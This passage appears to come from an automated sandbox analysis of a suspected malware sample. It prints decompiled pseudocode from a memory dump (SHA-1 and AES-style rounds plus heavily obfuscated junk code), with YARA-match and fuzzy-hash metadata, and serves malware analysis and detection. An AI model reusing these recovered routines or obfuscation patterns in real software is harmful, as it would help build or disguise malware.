                                        					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                        					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                        					_t353 = _t353 + 4;
                                        					_t277 =  &(_t277[0x10]);
                                        				} while (_t353 < 0x10);
                                        				_t278 =  &_v304;
                                        				_v8 = 0x10;
                                        				do {
                                        					_t399 =  *(_t278 - 0x18);
                                        					_t459 =  *(_t278 - 0x14);
                                        					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                        					asm("rol ecx, 1");
                                        					asm("rol ebx, 1");
                                        					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                        					_t278[8] = _t357;
                                        					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                        					_t278 =  &(_t278[4]);
                                        					asm("rol ebx, 1");
                                        					asm("rol edx, 1");
                                        					_t46 =  &_v8;
                                        					 *_t46 = _v8 - 1;
                                        					_t278[6] = _t318 ^ _t399;
                                        					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                        				} while ( *_t46 != 0);
                                        				_t320 =  *_t481;
                                        				_t279 = _t481[1];
                                        				_t358 = _t481[2];
                                        				_t404 = _t481[3];
                                        				_v12 = _t320;
                                        				_v16 = _t481[4];
                                        				_v8 = 0;
                                        				do {
                                        					asm("rol ebx, 0x5");
                                        					_t462 = _v8;
                                        					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                        					_t323 = _v12;
                                        					asm("ror eax, 0x2");
                                        					_v16 = _t404;
                                        					_v12 = _t488;
                                        					asm("rol esi, 0x5");
                                        					_v8 = _t358;
                                        					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                        					_t491 = _t279;
                                        					asm("ror ebx, 0x2");
                                        					_v16 = _v8;
                                        					_t362 = _v12;
                                        					_v8 = _t323;
                                        					_t325 = _v8;
                                        					_v12 = _t410;
                                        					asm("rol edx, 0x5");
                                        					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                        					_t413 = _v12;
                                        					_v16 = _t491;
                                        					asm("ror ecx, 0x2");
                                        					_v8 = _t362;
                                        					_v12 = _t285;
                                        					asm("rol eax, 0x5");
                                        					_v16 = _t325;
                                        					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                        					_t358 = _v12;
                                        					_t288 = _v8;
                                        					asm("ror edx, 0x2");
                                        					_v8 = _t413;
                                        					_v12 = _t496;
                                        					asm("rol esi, 0x5");
                                        					_v16 = _t288;
                                        					_t279 = _v12;
                                        					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                        					_t404 = _v8;
                                        					asm("ror ecx, 0x2");
                                        					_t463 = _t462 + 5;
                                        					_t320 = _t499;
                                        					_v12 = _t320;
                                        					_v8 = _t463;
                                        				} while (_t463 < 0x14);
                                        				_t464 = 0x14;
                                        				do {
                                        					asm("rol esi, 0x5");
                                        					asm("ror eax, 0x2");
                                        					_v16 = _t404;
                                        					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                        					_t334 = _v12;
                                        					_v12 = _t502;
                                        					asm("rol esi, 0x5");
                                        					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                        					asm("ror ebx, 0x2");
                                        					_t505 = _t279;
                                        					_v16 = _t358;
                                        					_t365 = _v12;
                                        					_v12 = _t420;
                                        					asm("rol edx, 0x5");
                                        					asm("ror ecx, 0x2");
                                        					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                        					_t423 = _v12;
                                        					_v8 = _t334;
                                        					_v8 = _t365;
                                        					_v12 = _t292;
                                        					asm("rol eax, 0x5");
                                        					_t464 = _t464 + 5;
                                        					_t358 = _v12;
                                        					asm("ror edx, 0x2");
                                        					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                        					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                        					_t295 = _v8;
                                        					_v8 = _t423;
                                        					_v12 = _t506;
                                        					asm("rol esi, 0x5");
                                        					_t404 = _v8;
                                        					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                        					_v16 = _t295;
                                        					_t279 = _v12;
                                        					asm("ror ecx, 0x2");
                                        					_v12 = _t499;
                                        				} while (_t464 < 0x28);
                                        				_v8 = 0x28;
                                        				do {
                                        					asm("rol esi, 0x5");
                                        					_v16 = _t404;
                                        					asm("ror eax, 0x2");
                                        					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                        					_t470 = _v12;
                                        					_v12 = _t510;
                                        					asm("rol esi, 0x5");
                                        					_t340 = _v8;
                                        					asm("ror edi, 0x2");
                                        					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                        					_v16 = _t358;
                                        					_t369 = _v12;
                                        					_v12 = _t432;
                                        					asm("rol edx, 0x5");
                                        					_v8 = _t279;
                                        					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                        					asm("ror ecx, 0x2");
                                        					_v16 = _v8;
                                        					_t299 = _v12;
                                        					_v8 = _t470;
                                        					_v12 = _t434;
                                        					asm("rol edx, 0x5");
                                        					asm("ror eax, 0x2");
                                        					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                        					_v16 = _v8;
                                        					_t437 = _t369;
                                        					_t358 = _v12;
                                        					_v8 = _t437;
                                        					_v12 = _t522;
                                        					asm("rol esi, 0x5");
                                        					_v16 = _v8;
                                        					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                        					_t404 = _t299;
                                        					_t279 = _v12;
                                        					asm("ror ecx, 0x2");
                                        					_v12 = _t499;
                                        					_t341 = _t340 + 5;
                                        					_v8 = _t341;
                                        				} while (_t341 < 0x3c);
                                        				_t478 = 0x3c;
                                        				_v8 = 0x3c;
                                        				do {
                                        					asm("rol esi, 0x5");
                                        					_t479 = _v8;
                                        					asm("ror eax, 0x2");
                                        					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                        					_t346 = _v12;
                                        					_v16 = _t404;
                                        					_v12 = _t525;
                                        					asm("rol esi, 0x5");
                                        					asm("ror ebx, 0x2");
                                        					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                        					_v16 = _t358;
                                        					_t370 = _v12;
                                        					_v12 = _t445;
                                        					asm("rol edx, 0x5");
                                        					_v16 = _t279;
                                        					asm("ror ecx, 0x2");
                                        					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                        					_t404 = _v12;
                                        					_v12 = _t303;
                                        					asm("rol eax, 0x5");
                                        					_v16 = _t346;
                                        					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                        					_t305 = _t370;
                                        					_v8 = _t346;
                                        					asm("ror edx, 0x2");
                                        					_v8 = _t370;
                                        					_t358 = _v12;
                                        					_v12 = _t532;
                                        					asm("rol esi, 0x5");
                                        					_t478 = _t479 + 5;
                                        					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                        					_v16 = _t305;
                                        					_t279 = _v12;
                                        					asm("ror ecx, 0x2");
                                        					_v8 = _t404;
                                        					_v12 = _t499;
                                        					_v8 = _t478;
                                        				} while (_t478 < 0x50);
                                        				_t480 = _a4;
                                        				_t480[2] = _t480[2] + _t358;
                                        				_t480[3] = _t480[3] + _t404;
                                        				_t311 = _t480[4] + _v16;
                                        				 *_t480 =  *_t480 + _t499;
                                        				_t480[1] = _t480[1] + _t279;
                                        				_t480[4] = _t311;
                                        				_t480[0x17] = 0;
                                        				return _t311;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        • API String ID: 0-3887548279
                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                        • Instruction ID: 761c4a68b585b28a38f9816625c1c2cc86ae2b6e7acc08c6d3f539b6cea400a7
                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                        • Instruction Fuzzy Hash: 6C022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: Ae{l
                                        • API String ID: 0-3292488897
                                        • Opcode ID: 7ea6961ee1de6c5cf2b075a4e01ede65308ea961d84d55b45f4d5730f8208721
                                        • Instruction ID: ebd60a3d2f3ded1b04ce07315a9f1805e97b3e351aba50871cac1bd12d865e89
                                        • Opcode Fuzzy Hash: 7ea6961ee1de6c5cf2b075a4e01ede65308ea961d84d55b45f4d5730f8208721
                                        • Instruction Fuzzy Hash: 0241B83655D6529BC3228E7889811E6BFB5FA52310B1447EAD4C14F223C732C88BC794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 26%
                                        			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				void* _t273;
                                        				signed int _t274;
                                        				signed int _t282;
                                        				signed int* _t358;
                                        				signed int _t383;
                                        				signed int* _t409;
                                        				signed int _t429;
                                        				signed int _t458;
                                        				signed int _t478;
                                        				signed int _t560;
                                        				signed int _t603;
                                        
                                        				_t273 = __eax;
                                        				asm("ror edi, 0x8");
                                        				asm("rol edx, 0x8");
                                        				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                        				asm("ror ebx, 0x8");
                                        				asm("rol edx, 0x8");
                                        				_v20 = _t458;
                                        				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                        				asm("ror ebx, 0x8");
                                        				asm("rol edx, 0x8");
                                        				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                        				asm("ror esi, 0x8");
                                        				asm("rol edx, 0x8");
                                        				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                        				asm("ror edx, 0x10");
                                        				asm("ror esi, 0x8");
                                        				asm("rol esi, 0x8");
                                        				_v24 = _t282;
                                        				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                        				asm("ror esi, 0x10");
                                        				asm("ror ebx, 0x8");
                                        				asm("rol ebx, 0x8");
                                        				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                        				asm("ror ebx, 0x8");
                                        				asm("ror edi, 0x10");
                                        				asm("rol edi, 0x8");
                                        				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                        				asm("ror edi, 0x10");
                                        				asm("ror ebx, 0x8");
                                        				asm("rol ebx, 0x8");
                                        				_t409 =  &(__ecx[8]);
                                        				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                        				_t478 = (_a4 >> 1) - 1;
                                        				_a4 = _t478;
                                        				if(_t478 != 0) {
                                        					do {
                                        						asm("ror edi, 0x10");
                                        						asm("ror ebx, 0x8");
                                        						asm("rol ebx, 0x8");
                                        						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                        						asm("ror edi, 0x10");
                                        						asm("ror ebx, 0x8");
                                        						asm("rol ebx, 0x8");
                                        						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                        						asm("ror ebx, 0x8");
                                        						asm("ror edi, 0x10");
                                        						asm("rol edi, 0x8");
                                        						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                        						asm("ror edi, 0x10");
                                        						asm("ror edx, 0x8");
                                        						asm("rol edx, 0x8");
                                        						_v24 = _t383;
                                        						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                        						asm("ror edx, 0x10");
                                        						asm("ror esi, 0x8");
                                        						asm("rol esi, 0x8");
                                        						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                        						asm("ror esi, 0x10");
                                        						asm("ror ebx, 0x8");
                                        						asm("rol ebx, 0x8");
                                        						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                        						_v12 = _t560;
                                        						asm("ror edi, 0x8");
                                        						asm("ror ebx, 0x10");
                                        						asm("rol ebx, 0x8");
                                        						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                        						asm("ror ebx, 0x10");
                                        						asm("ror edi, 0x8");
                                        						asm("rol edi, 0x8");
                                        						_t409 =  &(_t409[8]);
                                        						_t205 =  &_a4;
                                        						 *_t205 = _a4 - 1;
                                        						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                        					} while ( *_t205 != 0);
                                        				}
                                        				asm("ror ebx, 0x8");
                                        				asm("rol edi, 0x8");
                                        				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                        				asm("ror ebx, 0x8");
                                        				asm("rol edi, 0x8");
                                        				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                        				asm("ror ebx, 0x8");
                                        				asm("rol edi, 0x8");
                                        				_t358 = _a8;
                                        				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                        				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                        				asm("ror ecx, 0x8");
                                        				asm("rol edi, 0x8");
                                        				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                        				return _t274;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                        • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                        • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 51%
                                        			E0041D360(signed int __eax, signed char __ebx, void* __ecx, void* __edx, signed int __edi, signed int __esi) {
                                        				signed int _t45;
                                        				signed char _t46;
                                        				signed int _t52;
                                        				signed int _t53;
                                        				signed int _t54;
                                        				signed int _t55;
                                        				signed int _t56;
                                        
                                        				_t53 = __esi;
                                        				_t52 = __edi;
                                        				_t46 = __ebx;
                                        				_t45 = __eax & 0xd31aba3e;
                                        				_t55 = _t54 |  *0xe42c61b9;
                                        				asm("rcr dword [0x21f386a9], 0xc5");
                                        				 *0x50438acd =  *0x50438acd ^ __edi;
                                        				if(( *0x41dfe61d & _t45) == 0) {
                                        					__eflags =  *0x8a83dc7a & __ecx;
                                        					 *0xe00c5294 =  *0xe00c5294 ^ __esp;
                                        					asm("adc ch, [0x2866ba2a]");
                                        					asm("rcr dword [0xcd38cabd], 0x90");
                                        					asm("adc [0xe5a5e2fb], eax");
                                        					__edx = __edx +  *0xa646d82d;
                                        					__bh = __bh - 0xb7;
                                        					 *0x4cd57bb7 =  *0x4cd57bb7 | __ah;
                                        					asm("ror dword [0x553e4062], 0xef");
                                        					 *0xbb1fdfd5 =  *0xbb1fdfd5 - __ecx;
                                        					__ebp = __ebp -  *0x43a68d0f;
                                        					__eflags =  *0x44c79de6 & __ah;
                                        					asm("rcl byte [0x8352a7ca], 0x61");
                                        					 *0xeda702cb =  *0xeda702cb >> 0x8c;
                                        					_push( *0xeb3f3e68);
                                        					asm("stosb");
                                        					asm("ror byte [0x51c46be0], 0x5f");
                                        					asm("movsb");
                                        					asm("cmpsb");
                                        					asm("ror byte [0x976d5322], 0xb");
                                        					__edx = __edx +  *0xe63294f8;
                                        					 *0x99513ce1 =  *0x99513ce1 >> 0x46;
                                        					asm("adc ebx, [0x2cde7aed]");
                                        					asm("ror dword [0x2dee49b8], 0x24");
                                        					asm("adc eax, [0x940b13c5]");
                                        					__eflags = __edi -  *0x52059c93;
                                        					asm("adc [0x6ab1e5d7], bl");
                                        					__esi = __esi &  *0xdad57205;
                                        					asm("rol dword [0x2a056aa9], 0x59");
                                        					asm("movsw");
                                        					__eflags =  *0x56a9eba - __esi;
                                        					 *0xb2b05ae2 = __ah;
                                        					__esp =  *0x4d92056a * 0xb0ac;
                                        					__esi =  *0xac02056a * 0xa0c8;
                                        					_pop( *0x2119036a * 0x415);
                                        					__ebx = __ebx -  *0x4b8eb27;
                                        					 *0xb8ec1a1f =  *0xb8ec1a1f >> 0x6b;
                                        					 *0xe6045904 - __ch =  *0x50604b8 & __edx;
                                        					_t11 = __ch;
                                        					__ch =  *0xc905b8e4;
                                        					 *0xc905b8e4 = _t11;
                                        					__edx = __edx ^  *0x6a949781;
                                        					 *0xc4c5c505 = __esi;
                                        					__esp =  *0x4d92056a * 0x0000b0ac &  *0x56a9e;
                                        					asm("scasd");
                                        					__ebx = 0x76a9cbd;
                                        					asm("adc [0x5eebedfb], edx");
                                        					__ebx = 0x76a9cbe;
                                        					__ch =  *0xc905b8e4 + 0xb2;
                                        					_push( *0xaa9507bf);
                                        					 *0xb43e3db5 =  *0xb43e3db5 + __al;
                                        					 *0xe72607bf =  *0xe72607bf + __esi;
                                        					asm("scasb");
                                        					__ebp = __ebp - 0xbfae3427;
                                        					__eflags =  *0x5e9ec307 & __esi;
                                        					asm("adc ebp, [0xbfb611cc]");
                                        					asm("sbb [0x4453908], dl");
                                        					__edi =  *0x581e6a6a * 0x8c9;
                                        					__ebx = 0x76a9cbf;
                                        					__esi = __esi +  *0x73476b31;
                                        					__esp =  *0x4d92056a * 0x0000b0ac &  *0x56a9e | 0x08c96aa3;
                                        					 *0xfea9d5e5 = __bl;
                                        					 *0xc95f44d1 =  *0xc95f44d1 - 0x76a9cbd;
                                        					asm("sbb dh, 0x8");
                                        					__ecx =  *0x3d4b196b * 0xa777;
                                        					__eflags = __ecx - 0x409c966;
                                        					asm("stosd");
                                        					__ebp = __ebp |  *0xc6b28fbe;
                                        					__eflags = __ebp;
                                        					if(__eflags != 0) {
                                        						__esi =  *0x98bd374;
                                        						_t14 = __esp;
                                        						__esp =  *0x7b9d5967;
                                        						 *0x7b9d5967 = _t14;
                                        						if(__eflags >= 0) {
                                        							asm("adc ecx, [0xbb579678]");
                                        							asm("sbb ecx, 0xc7c7098b");
                                        							 *0xb2a7621b =  *0xb2a7621b >> 0xa9;
                                        							__eflags =  *0xb2a7621b;
                                        							if( *0xb2a7621b > 0) {
                                        								__edi =  *0xa8bd07e * 0xe74b;
                                        								__ebx = 0x76a9cbf |  *0xce6f2cc0;
                                        								asm("rcl dword [0xf3d4bdfa], 0x99");
                                        								__eflags = __ebp - 0x824c6e0b;
                                        								if(__ebp < 0x824c6e0b) {
                                        									__ebp = __ebp ^ 0x681cb273;
                                        									 *0x727ac9b6 =  *0x727ac9b6 & __bh;
                                        									asm("rcr byte [0xbcafd508], 0x8a");
                                        									 *0x5e42cd95 =  *0x5e42cd95 ^ __eax;
                                        									 *0x4dbd11c9 =  *0x4dbd11c9 | __dh;
                                        									__eflags =  *0x4dbd11c9;
                                        									if( *0x4dbd11c9 == 0) {
                                        										__ebp = __ebp +  *0xba7e177b;
                                        										asm("sbb ecx, [0x76bfadee]");
                                        										__ecx = __ecx &  *0x6ccebff4;
                                        										_push(__ecx);
                                        										 *0x77142f25 =  *0x77142f25 ^ __esp;
                                        										asm("sbb edi, 0xeb9c8217");
                                        										asm("rcr dword [0x28a0d319], 0x83");
                                        										asm("scasd");
                                        										_push(0xc5916ed4);
                                        										 *0x6264a205 =  *0x6264a205 >> 0xe8;
                                        										__edx = __edx | 0xb812942d;
                                        										__eax = __eax + 1;
                                        										 *0xdbc79330 =  *0xdbc79330 >> 0x20;
                                        										 *0x89de82ba =  *0x89de82ba - __esi;
                                        										__edi = __edi + 1;
                                        										__eflags =  *0xf26829e & 0x076a9cbd;
                                        										 *0xb015eb2 =  *0xb015eb2 >> 0x6b;
                                        										__ebp = __ebp ^  *0x203d3785;
                                        										__ebx = __ebx +  *0x5943448d;
                                        										asm("lodsd");
                                        										__ecx = __ecx - 0xce067267;
                                        										__edi = __edi + 1;
                                        										 *0x53f066c0 =  *0x53f066c0 & __esp;
                                        										__ah = __ah | 0x0000000c;
                                        										asm("sbb dl, [0xda4f0c8a]");
                                        										__eflags =  *0x7f98682c & __ah;
                                        										asm("ror byte [0xe6448e34], 0x42");
                                        										__ecx = 0xbe4dbc07;
                                        										 *0xbff17414 =  *0xbff17414 ^ __dl;
                                        										asm("ror dword [0x641ef716], 0x20");
                                        										__al = __al + 0xe5;
                                        										asm("sbb ebx, [0x240252e]");
                                        										_push(0xbe4dbc07);
